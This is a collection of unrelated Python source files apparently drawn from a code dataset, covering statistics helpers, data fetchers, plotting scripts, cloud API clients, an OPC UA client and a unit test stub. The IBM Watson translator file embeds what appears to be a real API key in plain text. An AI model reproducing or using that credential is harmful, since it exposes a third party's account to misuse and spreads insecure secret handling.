(not quite "any" Python objects, but let's hope we'll never deal with that)
"""
extli = list(zip(map(repr, li), range(len(li))))
extli.sort()
return [li[i[1]] for i in extli]
class ListTable(list): # from http://calebmadrigal.com/display-list-as-table-in-ipython-notebook/
"""
Overridden list class which takes a 2-dimensional list of
the form [[1,2,3],[4,5,6]], and renders an HTML Table in
IPython Notebook.
"""
def _repr_html_(self):
html = ["<table>"]
for row in self:
html.append("<tr>")
for col in row:
html.append("<td>{0}</td>".format(col))
html.append("</tr>")
html.append("</table>")
return ''.join(html)
def pretty_print_distr_table(table, names):
"""
Get a ListTable of the distribution specified by `table`, so that it can be
prettily rendered in ipython notebook
:param table: table of the distribution
:param names: names assigned to variables in table
:return: ListTable
"""
table = np.array(table)
t = ListTable()
t.append(names + ['P'])
for v in product(*lmap(compose(list, range), table.shape)):
t.append(list(v) + ["%0.3f" % table[v]])
return t
def pretty_print_distr_dict(d, names):
"""
Get a ListTable of the distribution specified by dict `d`, so that it can be
prettily rendered in ipython notebook.
:param d: dict of the distribution
:param names: names assigned to variables in dict
:return: ListTable
"""
t = ListTable()
t.append(names + ['P'])
items = list(d.items())
try:
items.sort()
except TypeError:
items = reprsort(items)
for v, p in items:
t.append(list(v) + ["%0.3f" % p])
return t
class permutation_dict(dict):
"""
A modification of dict.
Tuple keys are considered equal, if the first can be obtained by permuting the second.
For example (1, 3, 2, 0) == (0, 1, 2, 3)
Also, hooks for __getitem__ and __setitem__ are provided.
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._phook_setitem_ = lambda key, val: val
self._phook_getitem_ = lambda key, val: val
def __setitem__(self, arg, val):
if isinstance(arg, tuple):
arg = reprsort(list(arg))
arg = tuple(arg)
else:
arg = tuple([arg])
val = self._phook_setitem_(arg, val)
return super().__setitem__(arg, val)
def __getitem__(self, arg):
if isinstance(arg, tuple):
arg = reprsort(list(arg))
arg = tuple(arg)
else:
arg = tuple([arg])
return self._phook_getitem_(arg, super().__getitem__(arg))
def stabilize(alpha):
"""
Decorator which tries to reduce variance of a random function by
averaging it across multiple calls. Function must return a float.
:param alpha: required precision
:return: stabilized function
"""
def stabilize_decorator(f):
@wraps(f)
def new_f(*args, **kwargs):
x = 0.0
current = f(*args, **kwargs)
n = 1
while abs(x - current) > alpha or n == 1:
prev = current
x = f(*args, **kwargs)
current = (n / (n + 1)) * current + (x / (n + 1))
n += 1
return current
return new_f
return stabilize_decorator
def relmatrix(f, val1, val2):
"""
A table (2d numpy array) obtained by applying function `f` to different combinations of
values from `val1` and `val2`
:param f: applied function
:param val1: row values
:param val2: col values
:return: numpy array -- the table
"""
res = [[''] + list(val2)]
for v1 in val1:
li = [v1]
for v2 in val2:
li.append(f(v1, v2))
res.append(li)
return res
def infotable(data):
"""
Table of pairwise mutual informations between variables in the dataset.
:param data: the dataset
:return: the resulting table
"""
n_var = data.shape[1]
return [[mutual_information(data[:, i1:i1+1], data[:, i2:i2+1]) for i2 in range(n_var)] for i1 in range(n_var)]
def infomatrix(data):
"""
Table of pairwise mutual informations between variables in the dataset in the form of ListTable
:param data: the dataset
:return: the resulting table as ListTable
"""
n_var = data.shape[1]
return ListTable(relmatrix(lambda i1, i2: mutual_information(data[:, i1:i1+1], data[:, i2:i2+1]), range(n_var), range(n_var)))
def colvec(arr):
"""
Transforms a numpy array into a column vector.
:param arr: target arrray
:return: column vector -- numpy array of shape (n, 1)
"""
return np.transpose(np.atleast_2d(arr))
|
the-stack_106_22108
|
"""Commonly used functions not available in the Python2 standard library."""
from __future__ import division
import math
from sys import float_info
NORM_EPSILON = math.pow(float_info.epsilon, 0.25) # half-precision works for machine learning
def mean(values):
values = list(values)
return sum(map(float, values)) / len(values)
def median(values):
values = list(values)
values.sort()
return values[len(values) // 2]
def median2(values):
"""
Returns the median of the input values;
if there are an even number of inputs, returns the mean of the middle two.
"""
values = list(values)
n = len(values)
if n <= 2:
return mean(values)
values.sort()
if (n % 2) == 1:
return values[n//2]
i = n//2
return (values[i - 1] + values[i])/2.0
def variance(values):
values = list(values)
m = mean(values)
return sum((v - m) ** 2 for v in values) / len(values)
def stdev(values):
return math.sqrt(variance(values))
def softmax(values):
"""
Compute the softmax of the given value set, v_i = exp(v_i) / s,
where s = sum(exp(v_0), exp(v_1), ..)."""
e_values = list(map(math.exp, values))
s = sum(e_values)
inv_s = 1.0 / s
return [ev * inv_s for ev in e_values]
# Lookup table for commonly used {value} -> value functions.
stat_functions = {'min': min, 'max': max, 'mean': mean, 'median': median,
'median2': median2}
|
the-stack_106_22110
|
from ibm_watson import LanguageTranslatorV3
languages = {
"English": "en",
"French": "fr",
"Spanish": "es",
"German": "de"
}
API_key = 'ujft9Uu2E6jFCcaYAiUxIKfs4w6DnFnX3C_hac2IDr_N'
def initLT():
return LanguageTranslatorV3(
version = '2018-05-01',
iam_apikey = API_key)
def translate(text, target, source=None, service=initLT()):
if target not in languages.values():
target = languages[target]
if source is None:
source = service.identify(text).get_result()["languages"][0]["language"].split("-")[0]
else:
if source not in languages.values():
source = languages[source]
return service.translate(text=text, model_id=source + "-" + target).get_result()["translations"][0]["translation"]
|
the-stack_106_22111
|
import logging
import json
from urllib import error
from pkg_resources import resource_filename, Requirement
import pandas as pd
from pvlib import iotools
from requests.exceptions import HTTPError
from solarforecastarbiter.datamodel import Observation, SolarPowerPlant
from solarforecastarbiter.io.reference_observations import (
common, default_forecasts)
DEFAULT_SITEFILE = resource_filename(
Requirement.parse('solarforecastarbiter'),
'solarforecastarbiter/io/reference_observations/'
'srml_reference_sites.json')
# maps the desired variable names to those returned by pvlib.iotools
srml_variable_map = {
'ghi_': 'ghi',
'dni_': 'dni',
'dhi_': 'dhi',
'wind_speed_': 'wind_speed',
'temp_air_': 'air_temperature',
}
# maps SolarForecastArbiter interval_label to the SRML infix which
# designates the time resolution of each file. The list of file types
# is tried in order, so file types starting with 'P' designating
# processed data are listed first, such that if processed data exists
# we retrieve that first.
FILE_TYPE_MAP = {
1: ['PO', 'RO'],
5: ['PF', 'RF'],
15: ['PQ', 'RQ'],
60: ['PH', 'RH'],
}
logger = logging.getLogger('reference_data')
def adjust_site_parameters(site):
"""Inserts modeling parameters for sites with pv measurments
Parameters
----------
site: dict
Returns
-------
dict
Copy of inputs plus a new key 'modeling_parameters'.
"""
return common.apply_json_site_parameters(DEFAULT_SITEFILE, site)
def request_data(site, year, month):
"""Makes a request for each file type until successful or we
run out of filetypes.
Parameters
----------
site: :py:class:`solarforecastarbiter.datamodel.Site`
year: int
The year of the data to request.
month: int
The month of the data to request.
Returns
-------
DataFrame
A month of SRML data.
"""
extra_params = common.decode_extra_parameters(site)
station_code = extra_params['network_api_abbreviation']
interval_length = extra_params['observation_interval_length']
file_types = FILE_TYPE_MAP[interval_length]
for file_type in file_types:
# The list file_types are listed with processed data
# file types first. On a successful retrieval we return
# the month of data, otherwise we log info and continue
# until we've exhausted the list.
try:
srml_month = iotools.read_srml_month_from_solardat(
station_code, year, month, file_type)
except error.URLError:
logger.warning(f'Could not retrieve {file_type} for SRML data '
f'for site {site.name} on {year}/{month} .')
logger.debug(f'Site abbreviation: {station_code}')
continue
except pd.errors.EmptyDataError:
logger.warning(f'SRML returned an empty file for station '
f'{site.name} on {year}/{month}.')
continue
else:
return srml_month
logger.warning(f'Could not retrieve data for site {site.name} on '
f'{year}/{month}.')
def fetch(api, site, start, end):
"""Retrieve observation data for a srml site between start and end.
Parameters
----------
api : :py:class:`solarforecastarbiter.io.api.APISession`
An APISession with a valid JWT for accessing the Reference Data
user.
site : :py:class:`solarforecastarbiter.datamodel.Site`
Site object with the appropriate metadata.
start : datetime
The beginning of the period to request data for. Must include timezone.
end : datetime
The end of the period to request data for. Must include timezone.
Returns
-------
data : pandas.DataFrame
All of the requested data concatenated into a single DataFrame.
Raises
------
TypeError
If start and end have different timezones, or if they do not include a
timezone.
"""
month_dfs = []
start_year = start.year
start_month = start.month
# Retrieve each month file necessary
if start.tzinfo != end.tzinfo:
raise TypeError('start and end cannot have different timezones')
while start_year * 100 + start_month <= end.year * 100 + end.month:
logger.info(f'Requesting data for SRML site {site.name}'
f' for {start_year}-{start_month}')
srml_month = request_data(site, start_year, start_month)
if srml_month is not None:
month_dfs.append(srml_month)
start_month += 1
if start_month > 12:
start_month = 1
start_year += 1
try:
all_period_data = pd.concat(month_dfs)
except ValueError:
logger.warning(f'No data available for site {site.name} '
f'from {start} to {end}.')
return pd.DataFrame()
var_columns = [col for col in all_period_data.columns
if '_flag' not in col]
power_columns = [col for col in var_columns
if col.startswith('5')]
# adjust power from watts to megawatts
for column in power_columns:
all_period_data[column] = all_period_data[column] / 1000000
all_period_data = all_period_data.loc[start:end, var_columns]
# remove possible trailing NaNs, it is necessary to do this after slicing
# because SRML data has nighttime data prefilled with 0s through the end of
# the month. This may not be effective if a given site has more than a 24
# hour lag, which will cause last_valid_index to return the latest
# timestamp just before sunrise, but will suffice for the typical lag on
# the order of hours.
all_period_data = all_period_data[:all_period_data.last_valid_index()]
return all_period_data
def initialize_site_observations(api, site):
"""Creates an observation at the site for each variable in
an SRML site's file.
Parameters
----------
api: :py:class:`solarforecastarbiter.io.api.APISession`
site : :py:class:`solarforecastarbiter.datamodel.Site
The site object for which to create Observations.
Notes
-----
Since variables are labelled with an integer instrument
number, Observations are named with their variable and
instrument number found in the source files.
e.g. A SRML file contains two columns labelled, 1001, and
1002. These columns represent GHI at instrument 1 and
instrument 2 respectively. The `pvlib.iotools` package
converts these to 'ghi_1' and 'ghi_2' for us. We use these
labels to differentiate between measurements recorded by
different instruments.
"""
# Request ~month old data at initialization to ensure we get a response.
start = pd.Timestamp.utcnow() - pd.Timedelta('30 days')
end = start
try:
extra_params = common.decode_extra_parameters(site)
except ValueError:
logger.warning('Cannot create reference observations at MIDC site '
f'{site.name}, missing required parameters.')
return
# use site name without network here to build
# a name with the original column label rather than
# the SFA variable
site_name = common.site_name_no_network(site)
try:
site_df = fetch(api, site, start, end)
except error.HTTPError:
logger.error('Could not find data to create observations '
f'for SRML site {site_name}.')
return
else:
if site_df is None:
logger.error('Could not find data to create observations '
f'for SRML site {site_name}.')
return
for variable in srml_variable_map.keys():
matches = [col for col in site_df.columns
if col.startswith(variable)]
for match in matches:
observation_extra_parameters = extra_params.copy()
observation_extra_parameters.update({
'network_data_label': match})
try:
# Here, we pass a name with match instead of variable
# to differentiate between multiple observations of
# the same variable
common.create_observation(
api, site, srml_variable_map[variable],
name=f'{site_name} {match}',
interval_label='beginning',
extra_params=observation_extra_parameters)
except HTTPError as e:
logger.error(
f'Failed to create {variable} observation at Site '
f'{site.name}. Error: {e.response.text}')
with open(DEFAULT_SITEFILE) as fp:
obs_metadata = json.load(fp)['observations']
for obs in obs_metadata:
obs_site_extra_params = json.loads(obs['site']['extra_parameters'])
if obs_site_extra_params['network_api_id'] == extra_params[
'network_api_id']:
obs['site'] = site
observation = Observation.from_dict(obs)
common.check_and_post_observation(api, observation)
def initialize_site_forecasts(api, site):
"""
Create a forecasts for each variable measured at the site
Parameters
----------
api : :py:class:`solarforecastarbiter.io.api.APISession`
An active Reference user session.
site : :py:class:`solarforecastarbiter.datamodel.Site`
The site object for which to create Forecasts.
"""
variables = list(srml_variable_map.values())
if isinstance(site, SolarPowerPlant):
variables += ['ac_power', 'dc_power']
common.create_forecasts(
api, site, variables,
default_forecasts.TEMPLATE_FORECASTS)
def update_observation_data(api, sites, observations, start, end, *,
gaps_only=False):
"""Post new observation data to a list of SRML Observations
from start to end.
api : :py:class:`solarforecastarbiter.io.api.APISession`
An active Reference user session.
sites: list of :py:class:`solarforecastarbiter.datamodel.Site`
List of all reference sites as Objects
observations: list of :py:class:`solarforecastarbiter.datamodel.Observation`
List of all reference observations as Objects
start : datetime
The beginning of the period to request data for.
end : datetime
The end of the period to request data for.
gaps_only : bool, default False
If True, only update periods between start and end where there
are data gaps.
""" # noqa
srml_sites = common.filter_by_networks(sites, 'UO SRML')
for site in srml_sites:
common.update_site_observations(api, fetch, site, observations,
start, end, gaps_only=gaps_only)
|
the-stack_106_22113
|
################################################################################
# TLGProb: Two-Layer Gaussian Process Regression Model For
# Winning Probability Calculation of Two-Team Sports
# Github: https://github.com/MaxInGaussian/TLGProb
# Author: Max W. Y. Lam ([email protected])
################################################################################
try:
from TLGProb import TLGProb
except:
print("TLGProb is not installed yet! Trying to call directly from source...")
from sys import path
path.append("../")
from TLGProb import TLGProb
print("done.")
def performance_given_threshold(res, thre):
corr, incorr, rej = 0, 0, 0
for prob, corr_pred, y_pred, y_true in res:
if(prob > thre):
if(corr_pred):
corr += 1
else:
incorr += 1
else:
rej += 1
return corr, incorr, rej
TLGProb_NBA = TLGProb()
TLGProb_NBA.load_data()
res = TLGProb_NBA.eval_accuracy(2019)
## Visualize Result of Evaluation
import numpy as np
import matplotlib.pyplot as plt
from matplotlib.patches import Rectangle
n = len(res)
thres, corrs, incorrs = [], [], []
line_x, line_y, line_z = [], [], []
for i in range(501):
thre = 0.5+i*1./1000
line_x.append(thre)
corr, incorr, rej = performance_given_threshold(res, thre)
acc = 100 if corr+incorr == 0 else corr*100./(corr+incorr)
thres.append(thre)
corrs.append(corr)
incorrs.append(incorr)
line_y.append(acc)
rejp = rej*100./n
line_z.append(rejp)
fig, ax = plt.subplots(figsize=(10, 8), dpi=300)
ax.stackplot(thres, [incorrs, corrs], colors=["red", "green"], alpha=0.5)
ax.set_xlim([0.5, 1])
plt.xlabel("Acceptance Threshold of Winning Probability", fontsize=18)
plt.ylabel("Number of Matches", fontsize=18)
p1 = Rectangle((0, 0), 1, 1, fc="green", alpha=0.5)
p2 = Rectangle((0, 0), 1, 1, fc="red", alpha=0.5)
plt.legend([p1, p2], ['Correct Prediction', 'Incorrect Prediction'], prop={'size':15})
plt.tight_layout(True)
fig.savefig('../correct_vs_incorrect.eps')
fig, ax = plt.subplots(figsize=(10, 8), dpi=300)
ax.plot(line_x, line_y, 'b-', label="Accuracy")
plt.xlim([0.5, 1.0])
plt.ylim([line_y[0], 100.])
plt.xlabel("Acceptance Threshold of Winning Probability", fontsize=18)
plt.ylabel("Accuracy (%)", fontsize=18)
plt.tight_layout(True)
fig.savefig('../accuracy.eps')
fig, ax = plt.subplots(figsize=(10, 8), dpi=300)
ax.plot(line_x, line_z, 'r--', label="Rejection percentage")
plt.xlim([0.5, 1.0])
plt.ylim([0., 100.])
plt.xlabel("Acceptance Threshold of Winning Probability", fontsize=18)
plt.ylabel("Rejection Percentage (%)", fontsize=18)
plt.tight_layout(True)
fig.savefig('../rejection.eps')
fig, ax = plt.subplots(2, 1, sharex=True, figsize=(10, 8), dpi=300)
ax[0].stackplot(line_x, line_y, colors=['blue'], alpha=0.5)
ax[0].set_xlim([0.5, 1.0])
ax[0].set_ylim([line_y[0], 100.])
ax[0].set_ylabel("Accuracy (%)", fontsize=18)
ax[1].stackplot(line_x, line_z, colors=['red'], alpha=0.5)
ax[1].set_xlim([0.5, 1.0])
ax[1].set_ylim([0., 100.])
ax[1].set_xlabel("Acceptance Threshold of Winning Probability", fontsize=18)
ax[1].set_ylabel("Rejection Percentage (%)", fontsize=18)
plt.tight_layout(True)
fig.savefig('../accuracy_vs_rejection.eps')
|
the-stack_106_22114
|
from ..client import Client
class ProductTargeting(Client):
def get_targets(self, next_token: str = None, max_results: int = 0, filters: list = None):
self.uri_path = "/sb/targets/list"
self.method = "post"
self.data = {
"nextToken": next_token,
"maxResults": max_results,
"filters": filters
}
return self.execute()
def update_targets(self, data):
self.uri_path = "/sb/targets"
self.method = "put"
self.data = data
return self.execute()
def create_targets(self, data):
self.uri_path = "/sb/targets"
self.method = "post"
self.data = data
return self.execute()
def get_targets_by_id(self, target_id):
self.uri_path = "/sb/targets/{}".format(target_id)
self.method = "get"
return self.execute()
def delete_targets_by_id(self, target_id):
self.uri_path = "/sb/targets/{}".format(target_id)
self.method = "delete"
return self.execute()
|
the-stack_106_22116
|
import descriptors as desc
import pandas as pd
from sklearn.decomposition import PCA
from sklearn.preprocessing import StandardScaler
from sklearn.manifold import TSNE
import umap
import seaborn as sns
from scipy import stats
import numpy as np
import math
import matplotlib.pyplot as plt
class Plotter(object):
"""
A class used to plot the ECFP fingerprints of the molecules used to
instantiate it.
"""
def __init__(self, encoding_list, target, target_type, sim_type, get_desc, get_fingerprints):
# Error handeling sym_type
if sim_type != 'structural' and sim_type != 'tailored':
if len(target) > 0:
sim_type = 'tailored'
print('sim_type indicates the similarity type by which the plots are constructed.\n' +
'The supported similarity types are structural and tailored.\n' +
'Because a target list has been provided \'tailored\' as been selected as sym_type.')
else:
sim_type = 'structural'
print('sim_type indicates the similarity type by which the plots are constructed.\n' +
'The supported similarity types are structural and tailored.\n' +
'Because no target list has been provided \'structural\' as been selected as sym_type.')
if sim_type == "tailored" and len(target) == 0:
raise Exception("Target values missing")
self.sim_type = sim_type
# Error handeling target_type
if len(target) > 0:
df_target = pd.DataFrame(data=target)
unique_targets_ratio = 1.*df_target.iloc[:, 0].nunique()/df_target.iloc[:, 0].count() < 0.05
if target_type == 'R' and unique_targets_ratio:
print('Input received is \'R\' for target values that seem not continuous.')
if target_type != 'R' and target_type != 'C':
if unique_targets_ratio:
self.target_type = 'C'
print('target_type indicates if the target is a continuous variable or a class label.\n'+
'R stands for regression and C for classification. Input R as target type for continuous variables and C for class labels.\n'+
'From analysis of the target, C has been selected for target_type.')
else:
self.target_type = 'R'
print('target_type indicates if the target is a continuous variable or a class label.\n'+
'R stands for regression and C for classification. Input R as target type for continuous variables and C for class labels.\n'+
'From analysis of the target, R has been selected for target_type.')
else:
self.target_type = target_type
# Instantiate Plotter class
if sim_type == "tailored":
df_descriptors = get_desc(encoding_list)
self.df_descriptors, self.target = desc.select_descriptors_lasso(df_descriptors,target,kind=target_type)
else:
self.df_descriptors, self.target = get_fingerprints(encoding_list,target,2,2048)
@classmethod
def from_smiles(cls, smiles_list, target=[], target_type=None, sim_type=None):
"""
Class method to construct a Plotter object from a list of SMILES.
:param smile_list: List of the SMILES representation of the molecules to plot.
:type smile_list: dict
:param target: target values
:type target: dict
:param target_type: target type R (regression) or C (classificatino)
:type target_type: string
:param sim_type: similarity type structural or tailored
:type sim_type: string
:returns: A Plotter object for the molecules given as input.
:rtype: Plotter
"""
return cls(smiles_list, target, target_type, sim_type, desc.get_mordred_descriptors, desc.get_ecfp)
@classmethod
def from_inchi(cls, inchi_list, target=[], target_type=None, sim_type=None):
"""
Class method to construct a Plotter object from a list of InChi.
:param inchi_list: List of the InChi representation of the molecules to plot.
:type inchi_list: dict
:param target: target values
:type target: dict
:param target_type: target type R (regression) or C (classificatino)
:type target_type: string
:param sim_type: similarity type structural or tailored
:type sim_type: string
:returns: A Plotter object for the molecules given as input.
:rtype: Plotter
"""
return cls(inchi_list, target, target_type, sim_type, desc.get_mordred_descriptors_from_inchi, desc.get_ecfp_from_inchi)
def pca(self, kind="scatter", size=20, remove_outliers=False, is_colored=True, colorbar=False):
"""
Calculates the first 2 PCA components of ECFP fingerprints and plots
the data based on the result.
:param kind: Type of plot (default is scatter plot)
:type kind: string
:param size: Size of the plot (default size)
:type size: int
:param remove_outliers: Boolean value indicating if the outliers must be identified and removed (default False)
:type remove_outliers: boolean
:returns: The matplotlib axes containing the plot.
:rtype: Axes
"""
# Scale the data
if self.sim_type == "tailored":
data = StandardScaler().fit_transform(self.df_descriptors.values.tolist())
else:
data = self.df_descriptors.values.tolist()
# Linear dimensionality reduction to 2 components by PCA
pca = PCA(n_components=2)
first2ecpf_components = pca.fit_transform(data)
coverage_components = pca.explained_variance_ratio_
# Create labels for the plot
first_component = "PC-1 (" + "{:.0%}".format(coverage_components[0]) + ")"
second_component = "PC-2 (" + "{:.0%}".format(coverage_components[1]) + ")"
# Create a dataframe containinting the first 2 PCA components of ECFP
self.df_2_components = pd.DataFrame(data = first2ecpf_components
, columns = [first_component, second_component])
# Create a plot based on the PCA model
pca_plot = self.construct_plot(first_component, second_component, size, kind, "PCA plot", remove_outliers, is_colored, colorbar)
return pca_plot
def tsne(self, perplexity=None, random_state=None, pca=False, kind="scatter", size=20, remove_outliers=False, is_colored=True, colorbar=False):
"""
Calculates the first 2 t-SNE components of ECFP fingerprints and plots
the data based on the result.
:param perplexity: perplexity value for the t-SNE model
:type perplexity: int
:param pca_preprocessing_components: Number of components the PCA preprocessing will identify. By default the preprocessing is not used.
:type pca_preprocessing_components: int
:param kind: Type of plot (default is scatter plot)
:type kind: string
:param size: Size of the plot (default size)
:type size: int
:param remove_outliers: Boolean value indicating if the outliers must be identified and removed (default False)
:type remove_outliers: boolean
:returns: The matplotlib axes containing the plot.
:rtype: Axes
"""
# Scale the data
if self.sim_type == "tailored":
self.data = StandardScaler().fit_transform(self.df_descriptors.values.tolist())
else:
self.data = self.df_descriptors.values.tolist()
plot_title = "t-SNE plot"
# Preprocess the data with PCA
if pca and self.sim_type == "structural":
pca = PCA(n_components=30, random_state=random_state)
self.data = pca.fit_transform(self.data)
plot_title = "t-SNE plot from components with cumulative variance explained " + "{:.0%}".format(sum(pca.explained_variance_ratio_))
# Define the perplexity of the model
if perplexity == None:
perplexity_value = max(5, min(math.sqrt(len(self.data)), 50))
else:
if perplexity<5 or perplexity>50:
print('The perplexity is related to the number of nearest neighbors that is used in other manifold learning algorithms./n'+
'Robust results are obtained for values of perplexity between 5 and 50. The inputed value is outside that range.\n'+
'Therefore the closest value between 5 and 50 to the parameter inputed has been used in the method.')
perplexity_value = max(5, min(perplexity, 50))
# Embed the data in two dimensions
self.tsne_fit = TSNE(n_components=2, perplexity=perplexity_value, random_state=random_state)
ecfp_tsne_embedding = self.tsne_fit.fit_transform(self.data)
# Create a dataframe containinting the first 2 TSNE components of ECFP
self.df_2_components = pd.DataFrame(data = ecfp_tsne_embedding
, columns = ['t-SNE-1', 't-SNE-2'])
# Create a plot based on the TSNE model
tsne_plot = self.construct_plot('t-SNE-1', 't-SNE-2', size, kind, plot_title, remove_outliers, is_colored, colorbar)
return tsne_plot
def umap(self, n_neighbors=None, min_dist=None, random_state=None, kind="scatter", size=20, remove_outliers=False, is_colored=True, colorbar=False):
"""
Calculates the first 2 UMAP components of ECFP fingerprints and plots
the data based on the result.
:param num_neighbors: Number of neighbours used in the UMAP madel.
:type num_neighbors: int
:param kind: Type of plot (default is scatter plot)
:type kind: string
:param size: Size of the plot (default size)
:type size: int
:param remove_outliers: Boolean value indicating if the outliers must be identified and removed (default False)
:type remove_outliers: boolean
:returns: The matplotlib axes containing the plot.
:rtype: Axes
"""
# Scale the data
if self.sim_type == "tailored":
self.data = StandardScaler().fit_transform(self.df_descriptors.values.tolist())
else:
self.data = self.df_descriptors.values.tolist()
if n_neighbors == None:
n_neighbors = max(2, min(15, len(self.data)//4))
else:
if n_neighbors<2 or n_neighbors>(len(self.data)//4):
print('n_neighbors represents the size of the local neighborhood UMAP will look at when attempting to learn the manifold structure of the data./n'+
'Robust results are obtained for values of n_neighbors between 2 up to a quarter of the data. The inputed value is outside that range.\n'+
'Therefore the closest value, between 2 and a quarter of the data, to the parameter inputed has been used in the method.')
n_neighbors = max(2, min(n_neighbors, len(self.data)//4))
if min_dist == None:
min_dist = 0.9
else:
if min_dist<0.0 or min_dist>0.99:
print('min_dist controls how tightly UMAP is allowed to pack points together../n'+
'The value of min_dist can range from 0.0 up to 0.99. The inputed value is outside that range.\n'+
'Therefore the closest value between 0.0 and 0.99 to the parameter inputed has been used in the method.')
min_dist = max(0.0, min(min_dist, 0.99))
# Embed the data in two dimensions
self.umap_fit = umap.UMAP(n_neighbors=n_neighbors, min_dist=min_dist, random_state=random_state, n_components=2)
ecfp_umap_embedding = self.umap_fit.fit_transform(self.data)
# Create a dataframe containinting the first 2 UMAP components of ECFP
self.df_2_components = pd.DataFrame(data = ecfp_umap_embedding
, columns = ['UMAP-1', 'UMAP-2'])
# Create a plot based on the TSNE model
umap_plot = self.construct_plot('UMAP-1', 'UMAP-2', size, kind, "UMAP plot", remove_outliers, is_colored, colorbar)
return umap_plot
def tmap():
"""
Calculates and plots the TMAP based on ECFP fingerprints.
:returns: plot object
"""
pass
def construct_plot(self, x, y, size, kind, title, remove_outliers, is_colored, colorbar):
"""
Generates a plot for the given molecules embedded in two dimensions.
:param df_2_components: The molecules to plot
:type df_2_components: Dataframe
:param x: The first column of the dataframe containing the molecules
:type x: string
:param y: The second column of the dataframe containing the molecules
:type y: string
:param size: Size of the plot
:type size: int
:param kind: Type of plot
:type kind: string
:param title: Title of the plot
:type title: string
:param remove_outliers: Boolean value indicating if the outliers must be identified and removed
:type remove_outliers: boolean
:param is_colored: Indicates if the points must be colored according to target
:type is_colored: boolean
:returns: The matplotlib axes containing the plot.
:rtype: Axes
"""
if kind != 'scatter' and kind != 'hex' and kind != 'kde':
kind = 'scatter'
print('kind indicates which type of plot must be visualized. Currently supported visualization are:\n'+
'-scatter plot (scatter)\n'+
'-hexagon plot (hex)\n'+
'-kernel density estimation plot (kde)\n'+
'Please input one between scatter, hex or kde for parameter kind.\n'+
'As default scatter has been taken.')
df_2_components = self.df_2_components
# Define colors
hue = None
palette = None
if len(self.target) == 0:
is_colored = False;
else:
if is_colored:
df_2_components = df_2_components.assign(target=self.target)
hue = 'target'
if self.target_type == "R":
palette = sns.color_palette("inferno", as_cmap=True)
# Remove outliers (using Z-score)
if remove_outliers:
z_scores = stats.zscore(df_2_components[[x,y]])
abs_z_scores = np.abs(z_scores)
filtered_entries = (abs_z_scores < 3).all(axis=1)
df_2_components = df_2_components[filtered_entries]
# Define plot looks parameters
sns.set_style("dark")
sns.set_context("notebook", font_scale=size*0.15)
fig, ax = plt.subplots(figsize=(size,size))
# Create a plot based on the PCA components
if kind == "scatter":
plot = sns.scatterplot(x=x, y=y, hue=hue, palette=palette, data=df_2_components, s=80)
plot.set_label("scatter")
axis = plot
# Add colorbar
if self.target_type == "R" and colorbar:
plot.get_legend().remove()
norm = plt.Normalize(df_2_components['target'].min(), df_2_components['target'].max())
cm = plt.cm.ScalarMappable(cmap="inferno", norm=norm)
cm.set_array([])
plot.figure.colorbar(cm)
elif kind == "hex":
plot = ax.hexbin(df_2_components[x], df_2_components[y], gridsize=40, cmap='Blues')
fig.colorbar(plot, ax=ax)
ax.set_label("hex")
axis = ax
elif kind == "kde":
plot = sns.kdeplot(x=x, y=y, shade=True, data=df_2_components)
plot.set_label("kde")
axis = plot
# Remove units from axis
axis.set(yticks=[])
axis.set(xticks=[])
# Add labels
axis.set_title(title,fontsize=size*2)
axis.set_xlabel(x,fontsize=size*2)
axis.set_ylabel(y,fontsize=size*2)
#Do not stretch image
#plot.axis('square')
self.df_plot_xy = df_2_components[[x,y]]
return axis
|
the-stack_106_22118
|
import boto3
from boto3.dynamodb.conditions import Key
from pprint import pprint
def get_item():
"""Get item from the DynamoDB table."""
dynamo_db = boto3.resource("dynamodb")
table = dynamo_db.Table("devices")
response = table.query(KeyConditionExpression=Key("name").eq("core02-wdc01"))
for item in response["Items"]:
pprint(item)
if __name__ == "__main__":
get_item()
|
the-stack_106_22119
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Module to create an OPC UA client. Reference code:
https://github.com/FreeOpcUa/python-opcua/tree/master/examples
"""
#import sys
#sys.path.insert(0, "..")
import logging
import logging.config
import yaml
import coloredlogs
from opcua import Client
logger = logging.getLogger(__name__)
__author__ = "Brent Maranzano"
__license__ = "MIT"
if __name__ == "__main__":
client = Client("opc.tcp://python-opcua-server:4840/freeopcua/server/")
# client = Client("opc.tcp://admin@localhost:4840/freeopcua/server/") #connect using a user
try:
client.connect()
# Client has a few methods to get proxy to UA nodes that should always be in address space such as Root or Objects
root = client.get_root_node()
print("Objects node is: ", root)
# Node objects have methods to read and write node attributes as well as browse or populate address space
print("Children of root are: ", root.get_children())
# get a specific node knowing its node id
#var = client.get_node(ua.NodeId(1002, 2))
#var = client.get_node("ns=3;i=2002")
#print(var)
#var.get_data_value() # get value of node as a DataValue object
#var.get_value() # get value of node as a python builtin
#var.set_value(ua.Variant([23], ua.VariantType.Int64)) #set node value using explicit data type
#var.set_value(3.9) # set node value using implicit data type
# Now getting a variable node using its browse path
myvar = root.get_child(["0:Objects", "2:MyObject", "2:MyVariable"])
obj = root.get_child(["0:Objects", "2:MyObject"])
print("myvar is: ", myvar)
print("myobj is: ", obj)
# Stacked myvar access
# print("myvar is: ", root.get_children()[0].get_children()[1].get_variables()[0].get_value())
finally:
client.disconnect()
|
the-stack_106_22121
|
# Copyright 2015 Hewlett-Packard Development Company, L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import signal
import mock
from octavia.cmd import health_manager
from octavia.tests.unit import base
class TestHealthManagerCMD(base.TestCase):
def setUp(self):
super(TestHealthManagerCMD, self).setUp()
@mock.patch('multiprocessing.Event')
@mock.patch('octavia.amphorae.drivers.health.'
'heartbeat_udp.UDPStatusGetter')
def test_hm_listener(self, mock_getter,
mock_event):
mock_event.is_set.side_effect = [False, False, True]
getter_mock = mock.MagicMock()
check_mock = mock.MagicMock()
getter_mock.check = check_mock
getter_mock.check.side_effect = [None, Exception('break')]
mock_getter.return_value = getter_mock
health_manager.hm_listener(mock_event)
mock_getter.assert_called_once()
self.assertEqual(2, getter_mock.check.call_count)
@mock.patch('multiprocessing.Event')
@mock.patch('futurist.periodics.PeriodicWorker.start')
@mock.patch('futurist.periodics.PeriodicWorker.__init__')
@mock.patch('signal.signal')
